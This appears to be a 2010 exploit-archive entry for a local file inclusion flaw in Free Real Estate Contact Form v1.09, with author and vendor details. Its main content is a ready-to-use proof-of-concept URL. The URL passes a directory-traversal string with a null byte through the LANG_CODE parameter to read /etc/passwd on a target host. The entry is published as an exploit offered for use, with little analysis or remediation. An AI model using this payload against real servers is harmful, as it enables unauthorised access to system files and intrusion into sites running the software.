Free Real Estate Contact Form v1.09

[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]

# Title : Free Real Estate Contact Form v1.09 - Local File Inclusion
# Published : 2010-03-16
# Author : Pouya Daneshmand
# Previous Title : Joomla Component com_rwcards - Local File Inclusion
# Next Title : Online Community CMS by I-net SQL Injection Vulnerability

#################################################################
# Securitylab.ir
#################################################################
# Application Info:
# Name: Free Real Estate Contact Form
# Version: 1.09
# Vendor: http://www.phpkobo.com/realestate_contact.php
#################################################################
# Vulnerability Info:
# Type: Local File Inclusion
# Risk: Medium
#################################################################
Vulnerability:
http://site.com/codelib/sys/common.inc.php?LANG_CODE=../../../../../../../etc/passwd%00
#################################################################
# Discoverd By: Pouya Daneshmand
# Website: http://securitylab.ir
# Contacts: info[at]securitylab.ir & whh_iran[at]yahoo.com
###################################################################